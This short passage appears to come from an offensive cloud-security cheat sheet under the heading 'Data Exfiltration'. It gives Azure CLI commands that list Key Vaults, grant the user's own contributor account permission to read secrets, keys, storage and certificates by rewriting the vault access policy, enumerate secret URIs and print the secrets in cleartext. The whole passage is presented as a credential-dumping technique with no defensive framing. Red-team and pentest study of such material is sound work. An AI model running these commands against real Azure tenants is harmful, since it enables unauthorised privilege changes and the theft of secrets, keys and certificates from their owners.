Data Exfiltration

- Azure Key Vaults Dumping

To list all the Key Vault resources that the current account can view:

az keyvault list –query '[].name' --output tsv

To set the policy for a specified Key Vault, granting the specified user permissions to obtain secrets, keys, storage accounts, and certificates:

az keyvault set-policy --name <KeyVaultname> --upn <YourContributorUsername> --secret-permissions get list --key-permissions get list --storage-permissions get list --certificate-permissions get list

To get URI for Key Vault Secrets:

az keyvault secret list --vault-name <KeyVaultName> --query '[].id' --output tsv

To retrieve a secret from the Key Vault in cleartext using the secret's URI:

az keyvault secret show --id <URI from last command> | ConvertFrom-Json